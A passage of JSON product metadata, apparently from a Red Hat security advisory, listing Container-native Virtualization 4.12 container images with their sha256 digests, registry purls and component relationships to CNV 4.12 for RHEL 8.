"pkg:oci/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-exportserver\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "product": { "name": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "product_id": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "product": { "name": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "product_id": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "product_identification_helper": { "purl": "pkg:oci/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.12.0-10" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "product": { "name": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "product_id": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "product": { "name": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "product_id": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", "product": { "name": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", "product_id": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup\u0026tag=v4.12.0-89" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64" }, "product_reference": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64" }, "product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64" }, "product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64" }, "product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64" }, "product_reference": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64" }, "product_reference": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64" }, "product_reference": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64" }, "product_reference": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64" }, "product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64" }, "product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64" }, "product_reference": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" }, "product_reference": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64" }, "product_reference": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64" }, "product_reference": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64" }, "product_reference": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64" }, "product_reference": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64" }, "product_reference": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64" }, "product_reference": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" }, "product_reference": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": 